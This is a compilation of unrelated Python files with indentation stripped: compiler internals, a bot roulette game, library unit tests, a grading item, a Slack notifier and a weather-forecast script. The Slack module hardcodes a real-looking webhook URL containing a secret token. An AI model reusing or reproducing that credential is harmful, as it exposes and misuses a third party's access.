def buildInlinefn(self, thisp=False, thispt=None) -> None:
self.advance()
self.buildFunction(thisp=thisp, thispt=thispt)
# apply new properties
if(not config.__Osize__):
self.functions[-1].inline = True
self.globals.pop()
else:
self.functions[-1].wouldbe_inline = True
def buildNormalfn(self, thisp=False, thispt=None) -> None:
self.advance()
self.buildFunction(thisp=thisp, thispt=thispt)
def buildWinextern(self, thisp=False, thispt=None) -> None:
self.buildCextern(thisp, thispt)
self.functions[-1].winextern = True
def buildAutofn(self, thisp=False, thispt=None) -> None:
self.buildFunction(thisp=thisp, thispt=thispt)
def beginTemplate(self, thisp=False, thispt=None) -> None:
self.advance()
self.buildTemplate()
# compileLine is responsible for determining the category of a general unscoped statement.
# e.g.: unsigned int i = 0;
# e.g.: int main(int argc) {}
# And then either compiling the line if it's just a global variable, or sectioning it off to
# be handled by the Structure element or the Function element for more
# complex statements.
def compileLine(self, thisp=False, thispt=None):
# lines beginning with an ID will be a global variable
# (Or function, but that is handled in createConstant())
if (self.current_token.tok == T_ID):
self.buildGlobal()
elif (self.current_token.tok == T_KEYWORD):
# check if a response exists for given keyword
if self.current_token.value in keyword_responses:
# execute the response
keyword_responses[self.current_token.value](
self, thisp, thispt)
else:
# if not, throw error
throw(UnexpectedToken(self.current_token))
else:
throw(UnexpectedToken(self.current_token))
def verify_entrypoint(self, f):
# check returntype
if f.returntype.isflt():
print(InvalidMainReturn(f.declare_token).__repr__())
self.panicmode = True
# check valid parameters
if len(f.parameters) > 0:
# check parameter 1
if not (f.parameters[0].t.__eq__(INT)
or f.parameters[0].t.__eq__(LONG)):
warn(InvalidMainParameters(f.parameters[0].dtok))
# check for parameter 2
if len(f.parameters) > 1:
# check the parameter 2 type
if not (f.parameters[1].t.__eq__(CHAR.up().up())):
warn(InvalidMainParameters(f.parameters[1].dtok))
# compile all functions and fill in raw assembly info
def finalize(self):
# the Compiler needs to find the most suitable entrypoint.
# The first function called main will be used, regardless of
# returntype or parameters.
for f in self.functions:
if f.name == "main":
self.verify_entrypoint(f)
self.entry = f
f.extern = True
f.winextern = True
self.globals.append(
Variable(
DType(
f"function {f.createTypename()}",
8,
function_template=f
),
"main",
glob=True,
initializer=f,
isptr=True,
)
)
self.globals[-1].dtok = f.declare_token
# at this point all functions exist as Function objects, but have not
# been compiled into asm.
for f in (self.functions):
# TODO: Set up some size optimizations
# if(config.__Osize__):
# if f.wouldbe_inline and f.references == 0:
# f.inline = True
if not f.inline and not f.isTemplate:
self.currentfunction = f
# catch errors to continue compilation
try:
f.compile()
except Error as e:
# assuming the error is non fatal:
print(e.__repr__())
rfreeAll()
continue
if(True in norm_scratch_registers_inuse or True in sse_scratch_registers_inuse):
print(
f"Warning:\n\tRegister leak of degree {norm_scratch_registers_inuse.count(True)+sse_scratch_registers_inuse.count(True)} found in function:\n\t {f}\n\t called from: {config.LAST_RALLOC}\n")
rfreeAll() # make sure there are no register leaks between functions
# add comment
if(config.DO_DEBUG):
f.asm = f"\n\n\n;{f.__repr__()}\n\n\n\n\n{f.asm}"
self.text = f"{self.text}{f.asm}"
# garbage collection
f.GC()
for v in self.globals:
if v.name.startswith("__LC.S"):
self.constants += f"{v.name}: db {v.initializer}, 0\n"
# keyword_responses maps each keyword to the compiler method that will be used
# to handle it.
keyword_responses = {
"unsigned": Compiler.buildUnsigned,
"typedef": Compiler.buildTypedef,
"extern": Compiler.buildExtern,
"cextern": Compiler.buildCextern,
"__cdecl": Compiler.buildCdecl,
"global": Compiler.buildGlobalfn,
"struct": Compiler.buildStruct,
"inline": Compiler.buildInlinefn,
"function": Compiler.buildNormalfn,
"winextern": Compiler.buildWinextern,
"template": Compiler.beginTemplate,
"auto": Compiler.buildAutofn,
"enum": Compiler.buildEnum,
"class": Compiler.buildStruct,
"safetype": Compiler.buildSafetype
}
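# e.g. when Compiler.compileLine sees the 'typedef' keyword it looks it up in
# this table and dispatches to Compiler.buildTypedef(self, thisp, thispt).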
|
import random
from impbot.core import base
from impbot.handlers import command
class RouletteHandler(command.CommandHandler):
def run_roulette(self, message: base.Message, points: int) -> str:
starting_points = int(self.data.get(message.user.name, default="0"))
if starting_points < points:
if not starting_points:
raise base.UserError("You don't have any points!")
elif starting_points == 1:
raise base.UserError("You only have 1 point.")
raise base.UserError(f"You only have {starting_points} points.")
if random.randint(0, 1):
new_points = starting_points + points
self.data.set(message.user.name, str(new_points))
return (f"{message.user} won {points} points and now has "
f"{new_points} points!")
else:
new_points = starting_points - points
self.data.set(message.user.name, str(new_points))
return (f"{message.user} lost {points} points and now has "
f"{new_points} points.")
|
"""Test asyncpraw.models.front."""
from .. import IntegrationTest
class TestFront(IntegrationTest):
async def test_best(self):
with self.use_cassette():
submissions = await self.async_list(self.reddit.front.best())
assert len(submissions) == 100
async def test_controversial(self):
with self.use_cassette():
submissions = await self.async_list(self.reddit.front.controversial())
assert len(submissions) == 100
async def test_gilded(self):
with self.use_cassette():
submissions = await self.async_list(self.reddit.front.gilded())
assert len(submissions) == 100
async def test_hot(self):
with self.use_cassette():
submissions = await self.async_list(self.reddit.front.hot())
assert len(submissions) == 100
async def test_new(self):
with self.use_cassette():
submissions = await self.async_list(self.reddit.front.new())
assert len(submissions) == 100
async def test_top(self):
with self.use_cassette():
submissions = await self.async_list(self.reddit.front.top())
assert len(submissions) == 100
|
import math
from distutils.version import LooseVersion
import numpy
import pytest
import scipy
import sympy
from mpmath import mp
import orthopy
import quadpy
def test_golub_welsch(tol=1.0e-14):
"""Test the custom Gauss generator with the weight function x**2.
"""
alpha = 2.0
# Get the moment corresponding to the weight function omega(x) =
# x^alpha:
#
# / 0 if k is odd,
# int_{-1}^{+1} |x^alpha| x^k dx ={
# \ 2/(alpha+k+1) if k is even.
#
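    # For example, with alpha = 2 the first few moments (k = 0, 1, 2, 3, 4, ...)
    # are [2/3, 0, 2/5, 0, 2/7, ...], which is what the vectorized expression
    # below evaluates to.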
n = 5
k = numpy.arange(2 * n + 1)
moments = (1.0 + (-1.0) ** k) / (k + alpha + 1)
alpha, beta = quadpy.tools.golub_welsch(moments)
assert numpy.all(abs(alpha) < tol)
assert abs(beta[0] - 2.0 / 3.0) < tol
assert abs(beta[1] - 3.0 / 5.0) < tol
assert abs(beta[2] - 4.0 / 35.0) < tol
assert abs(beta[3] - 25.0 / 63.0) < tol
assert abs(beta[4] - 16.0 / 99.0) < tol
quadpy.tools.check_coefficients(moments, alpha, beta)
@pytest.mark.parametrize("dtype", [numpy.float, sympy.S])
def test_chebyshev(dtype):
alpha = 2
# Get the moment corresponding to the weight function omega(x) =
# x^alpha:
#
# / 0 if k is odd,
# int_{-1}^{+1} |x^alpha| x^k dx ={
# \ 2/(alpha+k+1) if k is even.
#
n = 5
if dtype == sympy.S:
moments = [sympy.S(1 + (-1) ** kk) / (kk + alpha + 1) for kk in range(2 * n)]
alpha, beta = quadpy.tools.chebyshev(moments)
assert all([a == 0 for a in alpha])
assert (
beta
== [
sympy.S(2) / 3,
sympy.S(3) / 5,
sympy.S(4) / 35,
sympy.S(25) / 63,
sympy.S(16) / 99,
]
).all()
else:
assert dtype == numpy.float
tol = 1.0e-14
k = numpy.arange(2 * n)
moments = (1.0 + (-1.0) ** k) / (k + alpha + 1)
alpha, beta = quadpy.tools.chebyshev(moments)
assert numpy.all(abs(alpha) < tol)
assert numpy.all(
abs(beta - [2.0 / 3.0, 3.0 / 5.0, 4.0 / 35.0, 25.0 / 63.0, 16.0 / 99.0])
< tol
)
def test_chebyshev_modified(tol=1.0e-14):
alpha = 2.0
# Get the moments corresponding to the Legendre polynomials and the weight
# function omega(x) = |x^alpha|:
#
# / 2/3 if k == 0,
# int_{-1}^{+1} |x^alpha| P_k(x) dx ={ 8/45 if k == 2,
# \ 0 otherwise.
#
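    # (Quick check for k == 2: the monic P_2(x) = x^2 - 1/3, so
    # int_{-1}^{+1} x^2 * (x^2 - 1/3) dx = 2/5 - 2/9 = 8/45.)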
n = 5
moments = numpy.zeros(2 * n)
moments[0] = 2.0 / 3.0
moments[2] = 8.0 / 45.0
_, _, b, c = orthopy.line_segment.recurrence_coefficients.legendre(
2 * n, "monic", symbolic=False
)
alpha, beta = quadpy.tools.chebyshev_modified(moments, b, c)
assert numpy.all(abs(alpha) < tol)
assert numpy.all(
abs(beta - [2.0 / 3.0, 3.0 / 5.0, 4.0 / 35.0, 25.0 / 63.0, 16.0 / 99.0]) < tol
)
def test_gauss_sympy():
n = 3
a = 0
b = 0
_, _, alpha, beta = orthopy.line_segment.recurrence_coefficients.jacobi(
n, a, b, "monic", symbolic=True
)
points, weights = quadpy.tools.scheme_from_rc(alpha, beta, "sympy")
assert points == [-sympy.sqrt(sympy.S(3) / 5), 0, +sympy.sqrt(sympy.S(3) / 5)]
assert weights == [sympy.S(5) / 9, sympy.S(8) / 9, sympy.S(5) / 9]
def test_gauss_mpmath():
n = 5
a = 0
b = 0
_, _, alpha, beta = orthopy.line_segment.recurrence_coefficients.jacobi(
n, a, b, "monic", symbolic=True
)
mp.dps = 50
points, weights = quadpy.tools.scheme_from_rc(alpha, beta, "mpmath")
tol = 1.0e-50
s = mp.sqrt(5 + 2 * mp.sqrt(mp.mpf(10) / mp.mpf(7))) / 3
t = mp.sqrt(5 - 2 * mp.sqrt(mp.mpf(10) / mp.mpf(7))) / 3
assert (abs(points - [-s, -t, 0.0, +t, +s]) < tol).all()
u = mp.mpf(128) / mp.mpf(225)
v = (322 + 13 * mp.sqrt(70)) / 900
w = (322 - 13 * mp.sqrt(70)) / 900
assert (abs(weights - [w, v, u, v, w]) < tol).all()
def test_gauss_numpy():
n = 5
tol = 1.0e-14
_, _, alpha, beta = orthopy.line_segment.recurrence_coefficients.legendre(
n, "monic", symbolic=False
)
flt = numpy.vectorize(float)
alpha = flt(alpha)
beta = flt(beta)
points, weights = quadpy.tools.scheme_from_rc(alpha, beta, "numpy")
s = math.sqrt(5.0 + 2 * math.sqrt(10.0 / 7.0)) / 3.0
t = math.sqrt(5.0 - 2 * math.sqrt(10.0 / 7.0)) / 3.0
assert (abs(points - [-s, -t, 0.0, +t, +s]) < tol).all()
u = 128.0 / 225.0
v = (322.0 + 13 * math.sqrt(70)) / 900.0
w = (322.0 - 13 * math.sqrt(70)) / 900.0
assert (abs(weights - [w, v, u, v, w]) < tol).all()
@pytest.mark.skipif(
LooseVersion(scipy.__version__) < LooseVersion("1.0.0"), reason="Requires SciPy 1.0"
)
def test_jacobi_reconstruction(tol=1.0e-14):
_, _, alpha1, beta1 = orthopy.line_segment.recurrence_coefficients.jacobi(
4, 2, 1, "monic", symbolic=False
)
points, weights = quadpy.tools.scheme_from_rc(alpha1, beta1, "numpy")
alpha2, beta2 = quadpy.tools.coefficients_from_gauss(points, weights)
assert numpy.all(abs(alpha1 - alpha2) < tol)
assert numpy.all(abs(beta1 - beta2) < tol)
@pytest.mark.skipif(
LooseVersion(scipy.__version__) < LooseVersion("1.0.0"), reason="Requires SciPy 1.0"
)
def test_gautschi_how_to_and_how_not_to():
"""Test Gautschi's famous example from
W. Gautschi,
How and how not to check Gaussian quadrature formulae,
BIT Numerical Mathematics,
June 1983, Volume 23, Issue 2, pp 209–216,
<https://doi.org/10.1007/BF02218441>.
"""
points = numpy.array(
[
1.457697817613696e-02,
8.102669876765460e-02,
2.081434595902250e-01,
3.944841255669402e-01,
6.315647839882239e-01,
9.076033998613676e-01,
1.210676808760832,
1.530983977242980,
1.861844587312434,
2.199712165681546,
2.543839804028289,
2.896173043105410,
3.262066731177372,
3.653371887506584,
4.102376773975577,
]
)
weights = numpy.array(
[
3.805398607861561e-2,
9.622028412880550e-2,
1.572176160500219e-1,
2.091895332583340e-1,
2.377990401332924e-1,
2.271382574940649e-1,
1.732845807252921e-1,
9.869554247686019e-2,
3.893631493517167e-2,
9.812496327697071e-3,
1.439191418328875e-3,
1.088910025516801e-4,
3.546866719463253e-6,
3.590718819809800e-8,
5.112611678291437e-11,
]
)
# weight function exp(-t**3/3)
n = len(points)
moments = numpy.array(
[3.0 ** ((k - 2) / 3.0) * math.gamma((k + 1) / 3.0) for k in range(2 * n)]
)
alpha, beta = quadpy.tools.coefficients_from_gauss(points, weights)
# alpha, beta = quadpy.tools.chebyshev(moments)
errors_alpha, errors_beta = quadpy.tools.check_coefficients(moments, alpha, beta)
assert numpy.max(errors_alpha) > 1.0e-2
assert numpy.max(errors_beta) > 1.0e-2
def test_integrate():
moments = quadpy.tools.integrate(lambda x: [x ** k for k in range(5)], -1, +1)
assert (moments == [2, 0, sympy.S(2) / 3, 0, sympy.S(2) / 5]).all()
moments = quadpy.tools.integrate(
lambda x: orthopy.line_segment.tree_legendre(x, 4, "monic", symbolic=True),
-1,
+1,
)
assert (moments == [2, 0, 0, 0, 0]).all()
# Example from Gautschi's "How to and how not to" article
moments = quadpy.tools.integrate(
lambda x: [x ** k * sympy.exp(-(x ** 3) / 3) for k in range(5)], 0, sympy.oo
)
S = numpy.vectorize(sympy.S)
gamma = numpy.vectorize(sympy.gamma)
n = numpy.arange(5)
reference = 3 ** (S(n - 2) / 3) * gamma(S(n + 1) / 3)
assert numpy.all([sympy.simplify(m - r) == 0 for m, r in zip(moments, reference)])
def test_stieltjes():
alpha0, beta0 = quadpy.tools.stieltjes(lambda t: 1, -1, +1, 5)
_, _, alpha1, beta1 = orthopy.line_segment.recurrence_coefficients.legendre(
5, "monic", symbolic=True
)
assert (alpha0 == alpha1).all()
assert (beta0 == beta1).all()
# def test_expt3():
# '''Full example from Gautschi's "How to and how not to" article.
# '''
# # moments = quadpy.tools.integrate(
# # lambda x: sympy.exp(-x**3/3),
# # 0, sympy.oo,
# # 31
# # )
# # print(moments)
# # alpha, beta = quadpy.tools.chebyshev(moments)
#
# alpha, beta = quadpy.tools.stieltjes(
# lambda x: sympy.exp(-x**3/3),
# 0, sympy.oo,
# 5
# )
# print(alpha)
# print(beta)
@pytest.mark.parametrize("k", [0, 2, 4])
def test_xk(k):
n = 10
moments = quadpy.tools.integrate(
lambda x: [x ** (i + k) for i in range(2 * n)], -1, +1
)
alpha, beta = quadpy.tools.chebyshev(moments)
assert (alpha == 0).all()
assert beta[0] == moments[0]
assert beta[1] == sympy.S(k + 1) / (k + 3)
assert beta[2] == sympy.S(4) / ((k + 5) * (k + 3))
quadpy.tools.scheme_from_rc(
numpy.array([sympy.N(a) for a in alpha], dtype=float),
numpy.array([sympy.N(b) for b in beta], dtype=float),
mode="numpy",
)
def leg_polys(x):
return orthopy.line_segment.tree_legendre(x, 19, "monic", symbolic=True)
moments = quadpy.tools.integrate(
lambda x: [x ** k * leg_poly for leg_poly in leg_polys(x)], -1, +1
)
_, _, a, b = orthopy.line_segment.recurrence_coefficients.legendre(
2 * n, "monic", symbolic=True
)
alpha, beta = quadpy.tools.chebyshev_modified(moments, a, b)
assert (alpha == 0).all()
assert beta[0] == moments[0]
assert beta[1] == sympy.S(k + 1) / (k + 3)
assert beta[2] == sympy.S(4) / ((k + 5) * (k + 3))
points, weights = quadpy.tools.scheme_from_rc(
numpy.array([sympy.N(a) for a in alpha], dtype=float),
numpy.array([sympy.N(b) for b in beta], dtype=float),
mode="numpy",
)
if __name__ == "__main__":
# test_gauss('mpmath')
# test_logo()
test_xk(2)
|
test = { 'name': 'q1_6',
'points': 2,
'suites': [ { 'cases': [ { 'code': '>>> '
'len(simulation_results_without_jokers)\n'
'100000',
'hidden': False,
'locked': False},
{ 'code': '>>> '
'np.count_nonzero(simulation_results_without_jokers '
'<= 26)\n'
'100000',
'hidden': False,
'locked': False},
{ 'code': '>>> '
'np.count_nonzero(simulation_results_without_jokers '
'>= 2)\n'
'100000',
'hidden': False,
'locked': False}],
'scored': True,
'setup': '',
'teardown': '',
'type': 'doctest'}]}
|
from entity import Item
from tool4time import get_timestamp_from_str, is_work_time, now_stamp, get_datetime_from_str, now
def todo_item_key(item: Item):
value = get_timestamp_from_str(item.create_time)
day_second = 60 * 60 * 24
if item.work:
# during working hours, work-tagged tasks are treated as if they were
# submitted 30 days later; otherwise as if submitted 30 days earlier
if is_work_time():
value = value + 30 * day_second
else:
value = value - 30 * day_second
if item.specific != 0:
# a date-specific task can only be completed on that particular day, so it
# gets the highest priority
value = now_stamp()
value = value + 100 * day_second
if item.deadline is not None:
# tasks with a deadline are ranked by their remaining time
# first drop the creation-time score and use the current time uniformly
# < 3 days: pin to top; < 7 days: give some extra weight; > 7 days: lower the weight
value = now_stamp()
deadline = get_datetime_from_str(item.deadline)
delta = deadline - now()
value = value + (56 - 8 * delta.days) * day_second - 8 * delta.seconds
return value
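# A rough worked example of the scoring above (hypothetical numbers): an item
# whose deadline is about 3 days away scores roughly now + (56 - 8*3) = now + 32
# days, outranking a work item seen during working hours (about now + 30 days)
# and any plain item scored by its creation time; a deadline about 7 days away
# scores roughly now + 0 days, and beyond 7 days the score drops below that of
# an item created just now.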
def done_item_key(item: Item):
return get_datetime_from_str(item.finish_time)
def old_item_key(item: Item):
return get_datetime_from_str(item.create_time)
|
"""
Copyright 2019 Skyscanner Ltd
Licensed under the Apache License, Version 2.0 (the "License"); you may not use
this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software distributed
under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
class Encryption:
def __init__(self, item):
self.item = item
def audit(self):
if self.item.arn.service in ['s3', 'dynamodb']:
if not self.item.encryption:
yield {
'level': 'medium',
'text': 'Objects are stored without encryption'
}
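# Hypothetical usage: for an unencrypted S3 bucket item,
# list(Encryption(item).audit()) yields a single medium-level finding,
# [{'level': 'medium', 'text': 'Objects are stored without encryption'}].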
|
import requests
from flask import request, url_for
from ..core import server
URL_JOONYOUNG = 'https://hooks.slack.com/services/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'
class Field():
title = ''
value = ''
short = False
def __init__(self, title='', value='', short=False):
self.title = title
self.value = value
self.short = short
def __json__(self):
return {'title': self.title, 'value': self.value, 'short': self.short}
# https://api.slack.com/docs/messages/builder
class Attachment():
title = ''
title_link = None
text = ''
color = '#303A4B'
fields = []
def __init__(self, title, title_link='', fields=[], text='', color=None):
self.title = title
self.title_link = title_link
self.fields = fields
self.text = text
if color:
self.color = color
def __json__(self):
# {
# "fallback":
# "Required plain-text summary of the attachment.",
# "pretext":
# "",
# "author_name":
# "Bobby Tables",
# "author_link":
# "http://flickr.com/bobby/",
# "author_icon":
# "http://flickr.com/icons/bobby.jpg",
# "image_url":
# "http://my-website.com/path/to/image.jpg",
# "thumb_url":
# "http://example.com/path/to/thumb.png",
# "footer":
# "Slack API",
# "footer_icon":
# "https://platform.slack-edge.com/img/default_application_icon.png",
# "ts":
# 123456789
# }
return {
'title': self.title,
'title_link': self.title_link,
'color': self.color,
'text': self.text,
'fields': [f.__json__() for f in self.fields]
}
def _send_slack_message(url, text, attachments=[]):
"""
Returns whether the message was sent successfully.
"""
if not url:
return False
if not text:
return False
if server.app.config.get('DEBUG'):
url = URL_JOONYOUNG
r = requests.post(
url,
json={
"text": text,
"attachments": [a.__json__() for a in attachments]
})
return (r.text == 'ok')
def post_feedback(description):
return _send_slack_message(
URL_JOONYOUNG,
'[KAIST BUS] {description}'.format(description=description))
|
#!/usr/bin/env python
#coding:utf-8
# Created: 15.11.2010
# Copyright (C) 2010, Manfred Moitzi
# License: MIT License
__author__ = "mozman <mozman@gmx.at>"
import unittest
from dxfwrite.dimlines import _DimStyle
class TestDimStyle(unittest.TestCase):
def test_get_value(self):
style = _DimStyle('test', layer="TESTLAYER")
self.assertEqual(style.layer, "TESTLAYER")
def test_set_value_as_attribute(self):
style = _DimStyle('test', )
style.layer = "TESTLAYER"
self.assertEqual(style.layer, "TESTLAYER")
def test_get_set_value_as_dict(self):
style = _DimStyle('test', )
style['layer'] = "TESTLAYER"
self.assertEqual(style['layer'], "TESTLAYER")
if __name__=='__main__':
unittest.main()
|
# -*- coding: utf-8 -*-
#@+leo-ver=5-thin
#@+node:ekr.20201129023817.1: * @file leoTest2.py
#@@first
"""
Support for Leo's new unit tests, contained in leo/unittests/test_*.py.
Run these tests using unittest or pytest from the command line.
See g.run_unit_tests and g.run_coverage_tests.
This file also contains classes that convert @test nodes in unitTest.leo to
tests in leo/unittest. Eventually these classes will move to scripts.leo.
"""
import time
import unittest
from leo.core import leoGlobals as g
from leo.core import leoApp
#@+others
#@+node:ekr.20201130195111.1: ** function.create_app
def create_app(gui_name='null'):
"""
Create the Leo application, g.app, the Gui, g.app.gui, and a commander.
This method is expensive (0.5 sec) only the first time it is called.
Thereafter, recreating g.app, g.app.gui, and new commands is fast.
"""
trace = False
t1 = time.process_time()
#
# Set g.unitTesting *early*, for guards, to suppress the splash screen, etc.
g.unitTesting = True
# Create g.app now, to avoid circular dependencies.
g.app = leoApp.LeoApp()
# Late imports.
from leo.core import leoConfig
from leo.core import leoNodes
from leo.core import leoCommands
from leo.core.leoGui import NullGui
if gui_name == 'qt':
from leo.plugins.qt_gui import LeoQtGui
t2 = time.process_time()
g.app.recentFilesManager = leoApp.RecentFilesManager()
g.app.loadManager = lm = leoApp.LoadManager()
lm.computeStandardDirectories()
if not g.app.setLeoID(useDialog=False, verbose=True):
raise ValueError("unable to set LeoID.")
g.app.nodeIndices = leoNodes.NodeIndices(g.app.leoID)
g.app.config = leoConfig.GlobalConfigManager()
g.app.db = g.NullObject('g.app.db')
g.app.pluginsController = g.NullObject('g.app.pluginsController')
g.app.commander_cacher = g.NullObject('g.app.commander_cacher')
if gui_name == 'null':
g.app.gui = NullGui()
elif gui_name == 'qt':
g.app.gui = LeoQtGui()
else:
raise TypeError(f"create_gui: unknown gui_name: {gui_name!r}")
t3 = time.process_time()
# Create a dummy commander, to do the imports in c.initObjects.
# Always use a null gui to avoid screen flash.
# setUp will create another commander.
c = leoCommands.Commands(fileName=None, gui=g.app.gui)
# Create minimal config dictionaries.
settings_d, bindings_d = lm.createDefaultSettingsDicts()
lm.globalSettingsDict = settings_d
lm.globalBindingsDict = bindings_d
c.config.settingsDict = settings_d
c.config.bindingsDict = bindings_d
assert g.unitTesting is True # Defensive.
t4 = time.process_time()
# Trace times. This trace happens only once:
# imports: 0.016
# gui: 0.000
# commander: 0.469
# total: 0.484
if trace and t4 - t3 > 0.1:
print('create_app:\n'
f" imports: {(t2-t1):.3f}\n"
f" gui: {(t3-t2):.3f}\n"
f"commander: {(t4-t2):.3f}\n"
f" total: {(t4-t1):.3f}\n")
return c
#@+node:ekr.20210902014907.1: ** class LeoUnitTest(unittest.TestCase)
class LeoUnitTest(unittest.TestCase):
"""
The base class for all unit tests in Leo.
Contains setUp/tearDown methods and various utilities.
"""
#@+others
#@+node:ekr.20210901140855.2: *3* LeoUnitTest.setUp, tearDown & setUpClass
@classmethod
def setUpClass(cls):
create_app(gui_name='null')
def setUp(self):
"""
Create a commander using a **null** gui, regardless of g.app.gui.
Create the nodes in the commander.
"""
# Do the import here to avoid circular dependencies.
from leo.core import leoCommands
from leo.core.leoGui import NullGui
# Set g.unitTesting *early*, for guards.
g.unitTesting = True
# Create a new commander for each test.
# This is fast, because setUpClass has done all the imports.
self.c = c = leoCommands.Commands(fileName=None, gui=NullGui())
# Init the 'root' and '@settings' nodes.
self.root_p = c.rootPosition()
self.root_p.h = 'root'
self.settings_p = self.root_p.insertAfter()
self.settings_p.h = '@settings'
# Select the 'root' node.
c.selectPosition(self.root_p)
def tearDown(self):
self.c = None
#@+node:ekr.20210830151601.1: *3* LeoUnitTest.create_test_outline
def create_test_outline(self):
p = self.c.p
# Create the following outline:
#
# root
# child clone a
# node clone 1
# child b
# child clone a
# node clone 1
# child c
# node clone 1
# child clone a
# node clone 1
# child b
# child clone a
# node clone 1
assert p == self.root_p
assert p.h == 'root'
# Child a
child_clone_a = p.insertAsLastChild()
child_clone_a.h = 'child clone a'
node_clone_1 = child_clone_a.insertAsLastChild()
node_clone_1.h = 'node clone 1'
# Child b
child_b = p.insertAsLastChild()
child_b.h = 'child b'
# Clone 'child clone a'
clone = child_clone_a.clone()
clone.moveToLastChildOf(child_b)
# Child c
child_c = p.insertAsLastChild()
child_c.h = 'child c'
# Clone 'node clone 1'
clone = node_clone_1.clone()
clone.moveToLastChildOf(child_c)
# Clone 'child clone a'
clone = child_clone_a.clone()
clone.moveToLastChildOf(p)
# Clone 'child b'
clone = child_b.clone()
clone.moveToLastChildOf(p)
#@+node:ekr.20210831101111.1: *3* LeoUnitTest.dump_tree
def dump_tree(self, tag=''):
c = self.c
print('')
g.trace(tag)
for p in c.all_positions():
print(f"clone? {int(p.isCloned())} {' '*p.level()} {p.h}")
#@-others
#@-others
#@-leo
|
# # Sample Data
# servers_memory = [
# 32, 32, 32, 16
# ]
# servers_cpu = [
# 10, 12, 8, 12
# ]
# tasks_memory = [
# 4, 8, 12, 16, 2,
# 8, 16, 10, 4, 8
# ]
# tasks_cpu = [
# 2, 4, 12, 8, 1,
# 2, 4, 4, 2, 2
# ]
# task_anti_affinity = [(1, 4), (3, 7), (3, 4), (6, 8)]
if __name__ == "__main__":
from src.allocation import allocator
alloc = allocator.Allocator([allocator.Server(32, 16, 1000)], [allocator.App(12, 12, 500)])
print(alloc.allocate())
|
#!/bin/env python3
# -*- coding: utf-8 -*-
# This little script gets XML data from CPTEC / INPE (Forecast Center
# of Time and Climate Studies of the National Institute for Space Research)
# for Brazilian cities and prints the result at the terminal.
import urllib.request
import xml.etree.ElementTree
import sys
import unicodedata
import datetime
TEMPO = {'ec': 'Encoberto com Chuvas Isoladas',
'ci': 'Chuvas Isoladas',
'c': 'Chuva',
'in': 'Instável',
'pp': 'Possibilidade de Pancadas de Chuva',
'cm': 'Chuva pela Manhã',
'cn': 'Chuva à Noite',
'pt': 'Pancadas de Chuva à Tarde',
'pm': 'Pancadas de Chuva pela Manhã',
'np': 'Nublado e Pancadas de Chuva',
'pc': 'Pancadas de Chuva',
'pn': 'Parcialmente Nublado',
'cv': 'Chuvisco',
'ch': 'Chuvoso',
't': 'Tempestade',
'ps': 'Predomínio de Sol',
'e': 'Encoberto',
'n': 'Nublado',
'cl': 'Céu Claro',
'nv': 'Nevoeiro',
'g': 'Geada',
'ne': 'Neve',
'nd': 'Não Definido',
'pnt': 'Pancadas de Chuva à Noite',
'psc': 'Possibilidade de Chuva',
'pcm': 'Possibilidade de Chuva pela Manhã',
'pct': 'Possibilidade de Chuva à Tarde',
'pcn': 'Possibilidade de Chuva à Noite',
'npt': 'Nublado com Pancadas à Tarde',
'npn': 'Nublado com Pancadas à Noite',
'ncn': 'Nublado com Possibilidade de Chuva à Noite',
'nct': 'Nublado com Possibilidade de Chuva à Tarde',
'ncm': 'Nublado com Possibilidade de Chuva pela Manhã',
'npm': 'Nublado com Pancadas de Chuva pela Manhã',
'npp': 'Nublado com Possibilidade de Chuva',
'vn': 'Variação de Nebulosidade',
'ct': 'Chuva à Tarde',
'ppn': 'Possibilidade de Pancadas de Chuva à Noite',
'ppt': 'Possibilidade de Pancadas de Chuva à Tarde',
'ppm': 'Possibilidade de Pancadas de Chuva pela Manhã'}
def getxmlcodes(args):
# Look up the city codes
codigos = []
for query in args:
with urllib.request.urlopen('http://servicos.cptec.inpe.br/XML/listaCidades?city={0}'.format(query)) as url:
content = url.read().decode('iso-8859-1')
root = xml.etree.ElementTree.fromstring(content)
codigos.extend([elem.text for elem in root.findall('./cidade/id')])
if len(codigos) == 0:
raise ValueError("A busca não retornou nenhuma cidade")
return codigos
def main():
if len(sys.argv) == 1 or sys.argv[1] in {'-h', '--help'}:
print('Modo de uso: {0} "CIDADE[1]" "CIDADE[2]" ... "CIDADE[N]"\nO uso de aspas (") é obrigatório'
.format(sys.argv[0]))
print('Exemplo: {0} "São Paulo"'.format(sys.argv[0]))
print('Não digite o nome do estado')
sys.exit(1)
# Format the input: remove accents and replace spaces with %20
args = [unicodedata.normalize('NFKD', elem).encode('ascii', 'ignore').decode('ascii').lower().replace(' ', '%20')
for elem in sys.argv[1:]]
# Fetch the XML for each city
for codes in getxmlcodes(args):
with urllib.request.urlopen('http://servicos.cptec.inpe.br/XML/cidade/{0}/previsao.xml'.format(codes)) as url:
content = url.read().decode('iso-8859-1')
# Filter the data
root = xml.etree.ElementTree.fromstring(content)
dias = [elem.text for elem in root.findall('previsao/dia')]
dias = [datetime.datetime.strptime(
elem, '%Y-%m-%d').strftime('%d/%m/%Y') for elem in dias]
clima = [elem.text for elem in root.findall('previsao/tempo')]
temperaturas = [(ma, mi) for ma, mi in zip([elem.text for elem in root.findall('previsao/maxima')],
[elem.text for elem in root.findall('previsao/minima')])]
iuv = [elem.text for elem in root.findall('previsao/iuv')]
# Print the result
print(
'\n\nPrevisão do tempo para {0} - {1}:'.format(root[0].text, root[1].text))
print('(Atualizado em {0})\n'.format(datetime.datetime.strptime(
root[2].text, '%Y-%m-%d').strftime('%d/%m/%Y')))
for i in range(len(dias)):
print('Dia {0}:'.format(dias[i]))
print('Clima: {0}'.format(TEMPO[clima[i]]))
print('Temperatura máxima: {0} °C'.format(temperaturas[i][0]))
print('Temperatura mínima: {0} °C'.format(temperaturas[i][1]))
print('Índice UV: {0}'.format(iuv[i]))
print()
if __name__ == '__main__':
main()
|
# -*- coding: utf-8 -*-
# Copyright 2018-2021 releng-tool
from releng_tool.util.file_flags import FileFlag
from releng_tool.util.file_flags import process_file_flag
from tests import prepare_workdir
import os
import unittest
class TestFileFlags(unittest.TestCase):
def test_ff_create(self):
with prepare_workdir() as work_dir:
file = os.path.join(work_dir, 'flag-create')
self.assertTrue(not os.path.exists(file))
state = process_file_flag(True, file)
self.assertEqual(state, FileFlag.CONFIGURED)
self.assertTrue(os.path.exists(file))
def test_ff_forced(self):
with prepare_workdir() as work_dir:
file = os.path.join(work_dir, 'flag-forced')
